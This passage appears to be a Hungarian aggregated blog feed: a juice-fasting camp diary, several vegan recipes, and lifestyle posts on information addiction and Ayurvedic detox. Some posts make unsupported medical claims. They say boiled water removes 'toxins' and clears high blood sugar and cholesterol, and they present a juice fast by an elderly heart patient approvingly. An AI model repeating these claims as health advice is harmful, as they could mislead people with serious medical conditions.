Egyik néni 47%-os szívmüködéssel nehezen bírta a böjtöt, a gyomra miatt. Törődtünk vele, bátorítottuk. Gyömbéres levet kapott, ami a gyomrát segíti. Míg egy másik fiú (36) cukorfüggősége depresszióba csapott át, így megoldásként a konzultációt követően dinnyét evett. Ő különben Dél-Szerbiából biciklivel jött. Több száz kilométert tett meg kétkeréken. Beszél angolul, németül, szerbül és tanulgatott a táborban magyarul. Fogékony a nyelvekre. Mi angolul beszélgetünk vele.
Sárga és görögdinnye lé aranyozta be a napunkat. Később pedig a cé kla almával már lágyabb és jobb, nem is okozott gyomorpanaszt mint a csak cékla a korábbiakban.
Káliumleveshez délután tettem fokhagymás lét, petrezselymes lét és csiliből egy keveset, így kicsit átverem az agyam, mivel hiányzik a só íze a levesből.
5. nap
Minden rendben volt a mai napon. Jókat beszélgettünk a táborzó emberekkel. Szilva-alma a délelőtti édes ital, majd cukkini-tök lé, azután pedig paradicsom hagymával lé. Mindegyik nagyon ízlik. A néni feladta estefelé a böjtöt. Elgyengült teljesen. Azt gondolom az Ő korában (70+) és a szívének állapotában ez nagyszerű eredmény elsőre, különösen, hogy szívbetegeknek nem igazán ajánlják a léböjt tábort. Dinnyét kapott, mint az átállás 1. lépése.
Egészségügyi előadás keretében a Hunzákról volt szó, amit igen érdeklődve hallgattam. Egy nép, akik sokáig élnek és nehéz megközelíteni őket a magas hegyormok miatt. Híresek a gyümölcsaszalásról is. Saját maguknak aszalják a hidegebb hónapokra a barackot és más gyümölcsöket is.
Elalváskor nyugtáztam magamban, hogy a tábor felén túl vagyunk és semmi problémám. Se éhségérzetem, se erős hasmenésem. Minden normális.
6. nap
Ma pihenő- és nyugalomnapra ébredtünk a táborba, így 1 órával később kelhettünk, nem 5.30-kor. A korábbi ébredést könnyen megszokta a szervezetem, így 6 előtt ébredtem, de pihengettem tovább.
Nagyon paprikás citromlé fogadott reggel, mint az utolsó vesetisztító shake. Szerencsére röviddel ezután a d innyelé jó édes volt, le is csúszott 2.5 pohárral. :) Cukkini sötétzöld színben igazán finom volt petrezselyemmel.
Este a nyugalomnap zárás kicsit hosszabbra sikeredett, már nem bírtam végigülni, így korábban kijöttem és visszavonultam a szobánkba, ahol élveztem a csöndet és a nyugalmat. Olvasgattam egy könyvet is.
7. nap
A nyugalomnap következtében sokkal pihentebb voltam, így az 5.30-kor esedékes ébresztő előtt már könnyedén felserkentem. Örültem, hogy végre fel tudok kelni az ébresztő előtt és futni menni. Nem vittem túlzásba, a mobilom szerint 1.6 km sikeredett reggeli futasként. Jólesően leizzadtam tőle, így igazán remekül esett a zuhanyzás utána. Egész nap örömmel töltött el, hogy futással kezdtem reggel. Bárcsak a következő reggel is időben ébrednék és kelnék hozzá.
A reggeli shake és a tea új volt ettől a naptól kezdve, mivel már májtisztítás vette kezdetét. A shake citromfélékből, gyömbérből és fokhagymából készült. Jobban izlik, mint a vese shake, de csak 1 pohárral merek inni belőle, mert elhangzott, hogy annyi teát kell inni majd, amennyit a shake-ből iszunk, hogy az epehólyag jól működjön. A tea ízére pedig hallottam pár keserűbb véleményt a visszatérő táborozók közül. Megittam a teából is a fél literemet később, de nem volt vészes íze. Oké, nem a legfinomabb gyógytea, de ennél rosszabb ízű teák is vannak.
Sajnos 3 résztvevő csak 1 hétre tudott jönni, így tőlük a fincsi szilvalé után elbúcsúzunk. Sajnálom, hogy menniük kellett, mert jókat tudtunk beszélgetni mindegyikőjükkel, főleg, hogy a férfi egykor atomfizikus pályára készült, a férjem pedig fizikusnak egy időben, de végül mindketten az emberek "szolgálatában" kötöttek ki, így igazán sok közös témájuk volt.
Délután kaptam egy jó, 50 perces masszázst, ami még jobban segíti a böjt általi anyagcserémet. Mint megtudtam, az egészségügyi előadó kedden reggel haza kell, hogy utazzon. (Ő amúgy sem csinálta a léböjtöt, mivel az utóbbi időben édesapját is gondozta, plusz egy nagy házat, kerttel rendbe kell tartania, talán ezen okokból is nagyon lesoványodva érkezett. Régebbről ismerem őt, hiszen az egyik munkahelyemen én lettem az utóda.) A szervezők megkértek (miután időközben kiderült, hogy én vagyok a Vegalife.blog.hu írója), hogy kedden tartsak "receptklub"-ot olyan nyers és turmix receptekből, amik ötletet és segítséget adnak a böjt utáni átállásra. Míg férjem és a többiek egy része elment úszni a közeli tóra, én megpróbáltam összeállítani a recepteket.
A délutáni káliumleves nagyon fini volt, nem tettem bele semmi plusz ízesítőt. Az esti májtea jobban esett mint reggel.
8. nap
Sikerült! Automatikusan felébredtem korábban, így 2.3 km reggeli futás össze is jött az ébredező falu utcáin.
Napközben megtartottam az egészségügyi előadást a receptjeim és a hozzá tartozó hasznos tudnivalók kapcsán. Jól sikerült. Már egy ideje nem is figyeltem, de ma eszembe jutott, és meglepve tapasztaltam, hogy nem zsíros a bőröm. Vesetea alatt végig az volt. Köszönhető a béltisztító kapszuláknak és a fekete levesnek, minden nap simán van székletünk.
Délután fél órában vacuum masszázst kaptam a combjaimra, elősegítve az ottani anyagcserét. Nagyon szuper volt!
9. nap
Fel voltam villanyozva, mert ma végre nem lovaskocsi program és tóban úszás várt ránk, hanem termálfürdő!!!! :) (Angliában erre nincs lehetőségem, így külön öröm számomra.)
Ugyanakkor valamiféle gyenge holtpontom ez a nap. Hiányzott az evés, ma először, mégha iható es sokszor finom leveket kapunk. Talán azért is, mert a termálfürdőben megcsapott a sült krumpli illata. A táborban nem volt nehéz elviselni a leves illatát, amikor főzték, de kikerülve a táborból, a megcsapott étel beindította a nyáltermelődésem annak ellenére, hogy a sült krumpli nem a kedvenc ételem egyátalán.
Mindenesetre a termálfürdő úszómedencéjében sikerült 1.1 km-t úsznom, majd áztattam magam, beszélgettem a többiekkel. Persze mi másról, ha nem kajákról, csak hogy kínozzuk magunkat :) Férjemmel arról is beszéltünk, mikor fogunk legközelebb pizzát enni. (Ami nagy kedvence.)
Este fél 8kor éreztem, hogy üres a gyomrom, igaz nem ittam fekete levest 2 óra után, csak zöldséglevest és kevés teát. A fekete leves pedig mindig segített eltelíteni.
Nagyon kívántam a barack húsába harapást, a ropogós dinnye evését, de a böjt mellett kitartottam, mivel tudom, már alig van hátra valami a táborból és a léböjtből.
10. nap
4.45-kor ébredtem magamtól. Ma is tartottam egy másik előadást, amire szintén felkértek. A csendes reggelt arra használtam, hogy készültem rá, mivel az 7.30-kor kezdődött. Élveztem, hogy mások még szenderegnek, én már ébren vagyok és hallgatom a csendet.
A tegnapi úszás nagyon jól esett, a mai napra a zentai piac meglátogatása volt a program. Mi is elmentünk. Ott aztán kívántam volna a sok fini gyümölcsöt és zöldséget, de nem szenvedtem tőle.
Délután orvosi méreckedést követően pár kilóval kevesebb voltam, vérnyomásom picit alacsonyabb a kezdetinél.
Kihagytam direkt a paradicsom levet. Már nem szerettem volna inni csak vizet. Mindössze fé l pohár káliumleves után várom az esti teát.
Táborzárás délután, mivel újabb 4 embernek kellett hazamennie. Vacuum m asszázst kaptam este megint. Szuper jó volt!
11. nap
A búcsú napja. Ma mindenki befejezte a tábort. Reggel fekete-leves, majd shake, tea. (Ez utóbbi kettőből most 1,5 pohárral ittam). A levek után 2 órával végre az jöhetett, amit annyira vártam: felvágtam egy dinnyét, szépen ropogott, reccsent, mintha csak arra várt volna, mikor vágjuk meg. Kánaááán! :) Mézédes dinnye! Mértékkel ettem belőle, de tudtam, mielőtt elhagyom a tábort, még egyszer fogok belőle enni.
A dinnye után 2 óra múlva ittam egy kis alma-őszibarack gyümilevet, majd bő fél óra múlva nagyon édes szilvából ettem és indulás előtt 1 órával ismét dinnyével laktam jól. A repülőútra csomagoltam a szilvából és 4 szem barackot is. Repülőre szállás előtt 2-2 szem barack a délelőtti gyümölcsözön után és ezzel be is fejeztük a napi evést. Szerencsés hazaérést követően éjfél után aludtunk el. Reggel 6 körül azonban mindketten automatikusan keltünk. (Szerbiában az 7 óra.)
Itthon
A nyers étkezést folytatjuk gyümölcsökkel az átállás jegyében. Férjem már várta, hogy mikor ehet párolt zöldséget, de megvárta, míg az átállás programja ezt lehetővé tette.
Igen, itthon, különösen Angliában a finom dinnye hiányában nehezebben megy az átállást tartani. De azért tesszük a tőlünk telhető legtöbbet és fokozatosan hozzuk vissza a zöldségféléket, magvakat. Gabonát még nem eszünk, de néhány napon belül az is bekövetkezik. Mindketten úgy gondoljuk, hogy amíg csak bírjuk, minél több nyers ételt fogyasztunk. A béltisztításnak, úgy mint máj- és vesetisztításnak is már vége, így most probiotikumot szedünk, hogy felépítsük vele a helyes bélműködést, ami a tisztítás követően nagyon szükséges. Prebiotikumokat pedig a zöldségek, gyümölcsök által sikerül. Igyekszem elhúzni az idejét annak, hogy bármi tésztát, vagy glutén tartalmú ételt magunkhoz vegyünk. Nem mintha bármelyikünk is gluténérzékeny lenne, hanem télen úgyis annyira jelen van a mindennapjainkban, hogy ez a léböjt egy új kezdetet kínált számunkra, amikor a lehető leghosszabb ideig igyekszünk pizzát, kenyeret, tésztát és társait nem enni.
A táborra visszatérve, azt gondoltam, nehezebb lesz. Néhány táborozót kicsit meglepett, hogy nincs fejfájásunk, rosszul létünk, semmi nagyobb problémánk a böjtből fakadóan. Ami azért kevésbé lepett meg minket, hiszen tábortól függetlenül is igyekeztünk egészségesen étkezni, élni. Mi már régóta nem eszünk húst, míg jó néhány táborozó úgy érkezett, hogy még a tábort megelőző hétvégén is húst fogyasztott.
Az alvásigényem még mindig alacsonyabb. Ma is nagyon korán ébredtem (5 óra körül), így a reggeli pirkadatot is ki tudtam használni arra, hogy befejezzem a léböjt tábori tapasztalataim.
Férjemmel évek óta beszéltünk arról, hogy jó lene egyszer elmenni egy léböjt táborba. Most végre összejött. Igaz, hogy nagy távolságot kellett legyőzni érte, de megérte a tapasztalatért és az egészségért. Crna Bara-n tervben van egy szeptemberi léböjt tábor is még idén, 2018-ban, ami megfelelő jelentkezési létszám esetén el is indul. Ha bővebben szeretnél a részletekről tájékozódni, az alábbi e-mail címen kaphatsz tájékoztatást: nemeta@tippnet.rs
Ribizlis köleskoch
Vannak a rizskochok, meg a rájuk csorgatott szörpök és alájuk öntött lekvárok. Igazán finomak, sőt, azon kevés “hagyományos és kutyult” édességek közé tartoznak, amitől nemhogy nem ráz a hideg, de talán minden nap meg tudnám enni. (Egyben elnézést kérek a máglyarakások, aranygaluskák, mákos gubák elkötelezett rajongóitól, mert ezeket az ételeket én egyszerűen nem értem. ;) )
Szóval, gondoltam egyet, és a rizsből lett köles, a szörpből meg rásütött nyers gyümölcs. Utólag jutott eszembe a vaníliafagyi. Na, az még nagyon illene ebbe a képbe. ;)
Hozzávalók egy 15 x 20-as sütőformához
- 5 dl rizstej + 250 ml víz
- 200 g köles
- 1 nagy csipet só
- 1 alma
- 2 evőkanál citromlé
- 70 g nádcukor
- 1 csomag vaníliás cukor
- 40 g margarin (bio)
- 150 g ribizli és áfonya (fagyasztott is tökéletes)
- A kölest mossuk át, és tegyük fel a megsózott, cukrozott tejben főni. Amikor felforrt, tegyük a legkisebb takarékra, és hagyjuk párolódni 20 percet, amíg sűrű krémet nem kapunk.
- Ekkor vegyük le a tűzről. és keverjük el benne a margarint és a citromlevet.
- A meghámozott almát reszeljük le, és ezt is keverjük a köleshez.
- A sütőtálat béleljük ki sütőpapírral, és simogassuk bele a krémet. A tetejét szórjuk meg gyümölccsel.
- 190 fokon süssük 50 percet, és hagyjuk kihűlni szeletelés előtt.
Extra tipp: másnap még finomabb! :)
Jó étvágyat!
Elkészítési idő: 50 perc
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat:
Kezdő Vegán
Növényi Tejek és Tejtermékek I
Növényi Tejtermékek II
A Mindennapi Superfood
Kezdő Vegán Angol nyelven
The post Ribizlis köleskoch appeared first on Kertkonyha.
Vegán vaníliás-eperlekváros piskótatekercs
2018. június 19. Mindennapi ételeink
Kislányunk egyszer evett ilyen piskótatekercset, azóta kéri, hogy készítsük el itthon is. Hozzávalók - a piskótához: 12,5 dkg Mester süteményliszt 2 ek. eritrit 3-4 g sütőpor fél mk szódabikarbóna 4 ek. olaj 1 ek. ecet 150 ml vaníliás szójatej (víz) 5 g útifű maghéj A töltelékhez: 1 csomag vaníliás puding 4 dl növényi tej (nálam kukoricatej) 2 dl vegán édesített habkrém Elkészítés: Először a krémet készítjük el, hogy legyen ideje kihűlni. A pudingot hagyományos módon elkészítjük, majd amikor kihűlt, hozzákeverjük a felvert tejszínhabot. A száraz hozzávalókat összekeverjük egy edényben, majd hozzáadjuk az olajat, tejet (vizet), ecetet. Egymáshoz öntjük. Összekeverjük. Egy tepsit kibélelünk sütőpapírral, erre simítjuk a tésztát, minden szélén kb 10 cm-t kihagyunk. 180 fokon max 15 percig sütjük. Mivel vékony a tészta, figyeljük gyakran, hamar megsül. Nedves konyharuhára borítjuk, rákenjük a lekvárt, majd a krémet, és feltekerjük.
Édesburgonyás-borsós curry
2018. június 10. Mindennapi ételeink
Hozzávalók: 1 fej vöröshagyma 2 ek. kókuszzsír 2 dl kókusztej 2 dkg friss gyömbér 1 ág korianderlevél 1 tk kurkuma 2 tk madras curry 0,5 kg édesburgonya 1 bögre borsó a kertből Elkészítés: A fűszereket a reszelt gyömbérrel együtt tegyük serpenyőbe, adjuk hozzá a kókuszolajat és kezdjük pirítani. 1-2 perc múlva öntsük fel a kókusztejjel, forraljuk fel. Adjuk hozzá a megpucolt és felkockázott édesburgonyának a 80%-át, a szintén meghámozott és felkockázott vöröshagymát. Majd amikor megpuhult az édesburgonya (5-10 perc), adjuk hozzá az előre megpárolt borsót és a maradék (kihagyott) összeturmixolt édesburgonyát. Tálaljuk friss korianderrel megszórva, (basmati, fekete szezámmal megszórt) rizzsel (vagy anélkül is) :-)
75 évesen jócskán letagadhatna 30 évet a korából – elárulja minek köszönheti fiatalságát
Miután nagymamája, és édesanyja is rákban hunyt el, Annette Larkins elhatározta, hogy radikális életmódváltásba fog. Ma már 75 éves, tökéletes egészségnek örvend, és legalább 20 évet le is tagadhat a korából. Annette, látva, hogy mennyi rákos megbetegedés volt a családjában, 1985-ben elhatározta, hogy vegetáriánus lesz. Sőt, a saját zöldségeit, gyümölcseit ő maga termeli meg, és […] The post 75 évesen jócskán letagadhatna 30 évet a korából – elárulja minek köszönheti fiatalságát appeared first on Filantropikum.com.
Cseresznyés piskóta tönköly búzaliszttel (tojásmentes)
2018. május 26. Élj harmóniában
Itt a cseresznye szezon (jótékony hatásairól és ájurvédikus hatásairól tegnap írtam egy bejegyzést, itt olvashatsz róla). Érdemes a cseresznyéből ilyenkor minél többet fogyasztani, mindenféle formában. Mint tudjátok imádok sütni főzni és lévén a férjem imádja a süteményeket. Kézenfekvő volt, amikor ma hazaértünk a bio piacról a sok friss zöldséggel, gyümölccsel, hogy a cseresznyével mindenképpen készítek valami finomságot neki:) Ez a süti tipikusan olyan nyári édesség, ami nagyon gyorsan elkészül és nagyon ízletes is. Bevetheted egy étkezés helyett (pl. reggelire) vagy akár vendégvárónak is kiváló egy könnyű vasárnapi ebéd után:) Én imádom az illatát, ahogy a vanília keveredik a sült cseresznyével. Hozzávalók 1 csomag sütőpor 2 bögre finom tönkölybúzaliszt 1 bögre teljes kiőrlésű tönkölybúzaliszt 1 bögre barna nádcukor 10 dkg vaj (vegán változatban 1/2 bögre kókuszzsír) 1 tk. szódabikarbóna vanília (vagy vaníliás cukor) 1,5 bögre víz cseresznye Vegyszermentes (bio) alapanyagokat használj:) Az előkészítéshez mosd meg a cseresznyét és magozd ki. A lisztet, sütőport, szódabikarbónát, cukrot és a vaníliát kever össze egy tálba. Tedd hozzá a vizet és az olvasztott vajat. A vajat én apróra vágom beteszem egy fémedénybe és forralt vízzel leöntöm, így pillanatok alatt kész az olvasztott vaj és már a vízzel el is van keveredve:) Figyeld a tészta állagát van amikor elég 1 bögre víz van, hogy sokkal több kell a liszt függvénye). Az így kapott masszába keverd bele a cseresznyét és az egészet öntsd bele egy kivajazott, lisztezett tepsibe. kb. 180 fokon süsd addig, amíg jók átsül (kb. 25 perc)
vaníliapudingos kölespiskóta
Végre újra a konyhában:). Egy újabb fantasztikus süti, aminek holnapra nyoma se lesz. Az utóbbi időben sajnos nem jutott időm sütögetni a vizsgaidőszak miatt, aminek még mindig nincs vége, de most egy kis kikapcs nagyon hiányzott. Bár őszintén megvallva nem érdemlem meg, mert a vizsgám egyik részét meg kell ismételnem, de nem fogom tagadni, mert úgy gondolom vállalnunk kell magunkat az összes sikerünkkel és bukásunkkal egyaránt. Hozzávalók - 150gr köles - 2tojás - 150gr tejföl - 50gr édesítőszer - fél csomag sütőpor - 1csomag vaníliás pudingpor + ehhez 30gr édesítőszer +250ml tej Így készítsd - Főzd meg a kölest egy kis édes vízben vagy tejben - Ha kihűlt, add hozzá a sütőport, tejfölt és a tojássárgáját - Verd fel a tojásfehérjét, majd keverd óvatosan a köleshez - Süsd meg 170 fokon 30perc alatt - Főzd meg a pudingot, majd önts le a piskótát
Vegán digestive keksz
Rendszeresen megkerestek gyors és egyszerű édesség ötletekért. Hát, azt hiszem, ez a verzió jogosan pályázik a legkényelmesebb keksz címre. :) Mert milyen őrült jó már az a gyúrós tészta, amit nem kell az ujjamról levakargatni közben! Mindent be a gépbe, aztán jól van. Imádom!
Gyakran kutakodsz az Interneten? -várod, hogy jöjjön üzeneted? - az információfüggőségről
2018. április 20. Élj harmóniában
Nagyon sokszor elmondtam már, hogy egy embert, a gondolkodását, a reakciót, a hozzáállását a dolgokhoz, az értékrendjét, a világnézetét a szokásai alakítanak ... a szokásinkat pedig az befolyásolja kivel-mivel társulunk. Kikkel vesszük körül magunkat, kivel barátkozunk, kinek a könyvét, írásait olvassuk, mit nézünk a képernyőn. .. Az életmódváltásnál mindig fontos, hogy régi rossz szokásoktól megszabaduljunk és helyette új, jó szokásokat alakítsunk ki. A mai kor emberének az egyik legrosszabb szokása, hogy hosszú időt tölt az Internet, a televízió, e-mail rendszer etc. előtt . Állandóan jön sok információ nincs megállás, már-már sokan kellemetlenül érzik magukat ha néhány pillanatig nem érkezik új üzenet, nem látják mi történik a facebook-on, twitteren, vagy nem jön e-mail. A világból öntik ránk az információt és az az ember érzése, hogy nem szabad lemaradni semmiről... A szervezetet nagyon kimeríti a folyamatos harckészültség és a megannyi információ feldolgozása az agy számára nem ideális. Amikor a tömegközeledésen utazom, az emberek min. 65% a telefonjával van elfoglalva, olvasgatják a híreket, a facebookot görgetik, van aki filmet néz vagy e-mailezik. A digitális technika kicsit átvette az uralmat modernkori társadalmunk felett. Kevesen néznek ki az ablakon és pihentetik a szemüket, agyukat, csak úgy élvezik ahogy süt nap vagy szép zöldek a fák... pedig a HÉV-ről csodás hegyeket, fákat, tájakat lehet látni. Egyszer a férjem Purusa mondta, ,,olyan ez a facebook, mintha az utcán mindenki, aki szembe jön velünk egy tömött utcán megkérdeznénk Tőle milyen kedved van, hogy érzed magad, mire gondolsz, mit ebédeltél, milyen a kutyád, hol nyaraltál, milyen filmet nézel.... kit érdekel megannyi ember tudata, ez hihetetlenül sok felesleges információ Folyamatosan várni az információt, állandóan keresni, kutatni egyfajta függőség és stresszhelyzetet hoz létre a szervezeted számára. A Tavaszi megújulás 30 napos kihívás keretében a mai napi kihívás, az információk áradatának tudatos kezelése. Őszintén Te mennyi időnként nézel rá a telefonodra? Ha megpittyen egy üzenet úgy érzed azonnal meg kell nézned? Reggel ébredés után első dolgaid egyike megnézni jött-e valami üzenet, van-e valami hír? Volt már, hogy rákerestél valamire és a végén fél órát töltöttél a gép előtt? Volt,hogy időben megcsúsztál, mert a számítógép vagy a telefonod lekötötte a figyelmed? Esetleg ha nem vagy elérhető, nem vagy on-line akkor szorongani kezdesz, aggódsz? Volt már olyan, hogy valaki szólt hozzád, kért Tőled valamit és Te mondtad, majd mindjárt mert nem tudtál elszakadni a géptől/telefonodtól? Nehéz eldönteni, hol kezdődik a komoly függőség és hol van még az egészséges határ. Sajnos mostanra tudományosan is alátámasztott tény, hogy az információfüggőség ugyanolyan függőség mint a drog vagy az alkohol, cigaretta, tv sorozat, vásárlás függés, aki additív az additív. A szervezetedre nézve ugyanúgy veszélyes, ha állandóan a telefonodat és a számítógépedet nézed, mint amikor valaki pl. állandóan a pohár fenekére néz. Az addikciók koráról egy későbbi cikkben fogok írni. Amikor az agyad számára a sok információ nem feldolgozható illetve, hogy állandóan megszakítod, a tevékenységeidet azt eredményezheti, hogy csökken a teljesítményed, romlik a koncentrációd, alvászavar, hangulati ingadozások, csökkent önértékelés, depresszió léphet fel. Sokan panaszkodnak, nem tudnak egy dologra fókuszálni, egyik tevékenységből csapong az elméjük a másikba. Sajnos ehhez hozzájön még az a társadalmi elvárás és nyomás is, hogy a környezeted elvárja, hogy a lehető legrövidebb idő alatt reagálj. Nem tudom Te tapasztaltad-e, hogy valaki ír egy e-mailt és ha nem kap választ 10 percen belül felhív, hogy ő most írt és még nem kapott választJ)) . A jógásaim sokszor írnak facebookon vagy e-mailben és meglépődnek, hogy nem reagálok. Lévén nem vagyok mindig on-line... és nem is szeretnék. Még az sms-ekre sem reagálok azonnal, mert mindennek meg van a maga ideje és helyeJ Szélsőséges esetekben a komoly függőknél elvonási tünetek jelennek meg, ha nem jutnak elegendő információhoz elég gyorsan - izzadás, remegés, nyugtalanság, kiborulás, alvászavar. Sokan az információfüggőség következtében halogatják a feladataikat, időpontokat tologatnak, amik további frusztrációhoz vezetek. Sokan görgetik a facebookot s látván, hogy az egyik ismerős Balin nyaral, a másik éppen valami hegyet mászik sokakon erőt vesz rajtuk egy rossz érzés, hogy ők miért nem részesei ilyen vagy olyan programnak. Majd ahelyett, hogy az emberek élveznék a pillanatot azon törik a fejüket mit kellene még megvalósítaniuk az életben. A mai kor embere soha nincs ott ahol éppen van... általában vagy a jövőben vagyunk vagy a múlton agyalunk. A legtöbben, ha megnéznék mennyi időt töltenek az Interneten, akkor meglepődve állapíthatnák meg, na ennyi idő alatt simán az Országos Kéktúrát végigcsinálhattam volnaJ Az információfüggés , az Internet és számítógép függés tönkreteszik az egyén társadalmi kapcsolatait, az egészségét és egy virtuális világba helyezik bele, megváltoztatják az értékrendet, a gondolkodást. Ha nem kezeled tudatosan a digitális technikát, akkor azt veszed észre magadon, hogy a rabja lettél és értelmes dolgokkal kevesebb időt foglalkozol. nem fogsz tudni jelen leni a pillanatban, megélni az élet fontos dolgait. Szabadulj meg az információ függőségtől Először is tedd magadévá azt a gondolatot, hogy nem kell Neked mindenről tudni. Értsd meg, hogy nem maradsz le semmiről és az események kimenetelét sem változtatja meg az, hogy Te most erről azonnal tudtál értesülni, ami megtörtént az megtörtént.... Ismered a mondást a kevesebb néha több. Inkább kevesebb időt tölts az információk özönében, de azok az információkat koncentráltan, figyelmesen fogadd be és megfelelően tudj reagálni rájuk. Jobb 1 barátoddal találkozni személyesen egy nap és 100%-ban rá figyelni, vele lenni megélni vele közösen a pillanatot. Mint az Internet előtt ülve cikkeket olvasva, facebookot görgetve 10 emberrel chatelni . Szoktasd le Magad arról, hogy állandóan valami információ után kutakodj. Használd tudatosan az információhoz való hozzájutási lehetőségeket. Próbálj a jelenben létezni, megélni a pillanatokat. Keresd az igazi emberi kapcsolatokat. Ha úgy érzed sok a rád ömlő információ és elvárás, akkor egyszerűen kapcsold ki a technikát és foglald le magad olyan dologgal ami feltölt, kikapcsol. A régi rossz szokásoktól úgy tudsz megszabadulni, hogy helyette új, jó szokásokat alakítasz ki. Mivel töltsd azt az időt, amit eddig az információk özönében töltöttél? Sétálj! Ha lehet valami természetközei helyen vagy parkban. Menj ki a szabadba, élvezd a természet csodáit, a fákat, a virágok illatát, nézd a kék eget, a felhőket. Ne időre akarja teljesíteni, ne siess, lassan, kényelmes tempóban haladj és ne telefonálj közben. Csak engedd meg magadnak, hogy kikapcsolj. még a telefonodat is ki kell néha kapcsolni. Teremts csendet! Próbáld minimalizálni az érzékszerveidet ért támadásokat. Kerüld a zajos helyeket, a folyamatos háttérzajokat - tv, zene. Kerüld a sok beszédet is, mert nagyon kimeríti a szervezeted. Tudatosan maradj csendben, akárcsak napközben néhány órára és figyeld meg a hatásait. Az elején furcsa lesz, még az is lehet kicsit feszültté válsz - ha amúgy be nem áll a szád - de próbálkozz meg veleJ és figyeld meg a tapasztalataidat - milyen hatással van az energiaszintedre, az elméd nyugalmára, a stressz szintedre, koncentrációdra. Válogasd meg mit engedsz be az életedbe! Válogasd meg, kikkel és mikkel szeretnéd társítani az elméd - lévén ez lesz rád hatással a későbbiekben. Minden, amivel körülveszed Magad hatással van a tudatodra. Ha pl megnézel egy akciófilmet, garantálom, hogy pörgősebb az elméd, a kommunikációd, mint előtte. Nekünk nincs tv-nk, ritkán nézünk filmeket, de egyszer egy amerikai ilyen akciós film után észrevettem, hogy kicsit intenzívebben szólok a férjemhez. Mondtam is neki, ha az emberek ilyen filmeket néznek, nem csodálom, hogy annyi válás van. Ha egy depis filmet nézel, akkor figyeld meg mennyire tapasztalsz utána boldogságot, figyeld meg hogyan hat a tudatodra. Sajnos észre fogod venni magadon, hogy neked sincs olyan jó kedved utána. Vagy ha beleolvasol olyan emberek kommentjeibe, akik csak siránkoznak, negatívak azt veszed észre magadon, hogy Te is kezdesz negatív lenni. Ha harmóniára vágysz akkor olyan dolgokkal foglalkozz, ami békés, harmonikus és részesítsd előnyben a csendet. Ha szeretnél felpörögni, akkor pedig az olyan dolgokat részesítsd előnyben, amik emelik a vérnyomásod és felpörgetnek. Ha pozitív szeretnél lenni, akkor pozitív emberekkel vedd körül magad. Az ételek tudatra gyakorolt hatásait egy korábbi cikkemben már kifejtettem itt olvashatod. Jógázz! A klasszikus, normál tempóban, tudatosan, megfelelő légzéssel végzett jógagyakorlatok a figyelmedet a jelen pillanatba hozzák, segítenek az önismeretben, önfejlesztésben, javítják a koncentrációdat és feltöltik a szervezeted, kipihentté teszik az idegrendszered, javítják a belső szervek állapotát és normalizálják a hormonrendszered működését. Tölts kevesebb időt az információk tengerében és több időt az elméd békéjének megteremtésével, önmagad megismerésével, fejlesztésével. szeretettel Kati
Legegyszerűbb és legősibb módszer a méreganyagok kioldására - tisztítsd meg a szervezeted
2018. április 18. Élj harmóniában
T alán észrevetted, hogy a tél végére kicsit elfárad, kimerül a szervezeted. A téli mozgásszegény életmód, a helytelen szokások, a nem megfelelő táplálkozás eredménye, hogy gyengül az emésztőerő és egyre több salakanyag rakódik le a szervezetben (ezt az ájurvéda "ama"-nak hívja). Egy idő után ezek a salakanyagok elzárják a test csatornáit ami betegségek kialakulásához vezethet. Felhalmozódott méreganyagok jelei A méreganyagok lerakódásának jelei: romlik a közérzet, nehezebbé válik az emésztés (puffadás, görcsök, székrekedés, hasmenés), a testben elakadások, dugulások jelennek meg (pl. székrekedés, arcüregek telítettsége) reggel kimerülten ébredünk, napközben is fáradtnak és elnehezültnek érezzünk magunkat, csökken a koncentrációs képességünk, könnyen válunk kedvetlenné, gyengül az immunrendszer, aminek a hatására rendszeresen megbetegszünk, könnyen elkapunk minden betegséget, megváltozik az íz érzékelésünk, szellemileg is tunyábbá válunk A Tavaszi megújulás 30 napos kihívás csoportot csináljuk most a faceboookon, és ma van a 9. nap amikor megkezdjük a szervezet tisztítását. Amúgy a csoporthoz bárki csatlakozhat, akinek van kedve egy kis megújuláshoz, életmódváltáshoz. Ha csak néhány apró dolgot változtatsz az életedben már csodát tapasztalhatsz.Ha szeretnél itt tudsz csatlakozni a csoporthoz A szervezted megtisztítása A szervezetednek, szüksége arra, hogy időközönként tehermentesítsd, megtisztítsd. A szervezet tisztítására az ájurvéda ősi tudása szerint a legideálisabb és legegyszerűbb, amit tehetsz Magadért a forralt víz fogyasztása. Én 15 éve alkalmazom, a jógásaim mindig termosszal látnak:) na és persze megannyi jógás tanítványomnak segített már sokat a forralt víz fogyasztása. Büszkén írhatom Nektek, hogy 73 éves Édesanyám már vagy 5 éve nagy sikerrel alkalmazza:) Minden forralt vizes kúra után meglepődik a háziorvosa, hogy a vérképéből hogy eltűntek a mindenféle csúnyaságok - magas cukor, magas koleszterinszint, etc...) A szervezetedben a legjobb a lerakódott ama felszámolására a meleg víz. Forralj fel reggel tiszta minőségű vizet (pl forrásvíz) kb 10-15 percig - tehetsz bele gyömbért is. A vizet melegen kortyolgasd a nap során lehetőleg fél óránként kis kortyot - a vizet tartsd termoszban, hogy meleg maradjon. Minimum 1,5 2 liter meleg vizet igyál naponta. Mielőtt elmosolyodnál, na persze, pont a forralt víz segít a méregtelenítésben:) Ez a legősibb bevált módszer, amit az emberiség évezredek óta nagy sikerrel alkalmaz. Próbáld ki és figyeld meg a tapasztalatokat saját Magadon. Sokszor kérdezitek , miért kell melegen... gondolj csak bele egy koszos, zsíros edényt el tudsz mosni hideg vízzel? Ha ismersz távol keleti embereket senki nem iszik hideget... egyszer valaki mondta, hogy a nyugatiak ezért vannak elhízva, mert eszik a sok zsíros ételt és hideget isznak hozzá vagy már az étel maga hideg (pl szendvicsek) a zsír így nem tud jól emésztődni, feloldódni és szépen lerakódik...tudod, mint a kihűlt pörkölt tetején... Hidd el.... nagyon hasznos lesz néhány forralt vizes nap a szervezetednek:) Ha tudod tartsd fenn ezt a szokásodat, hogy ne fogyassz hideg ételeket, italokat. Jól támogatja a méregtelenítést, ha reggelenként egy pohár meleg citromos vízzel indítod a napod. (leírást itt olvashatod)
Lehet, hogy te is a visztópiától szenvedsz? – A kegyetlenség rendszerének felfedezése
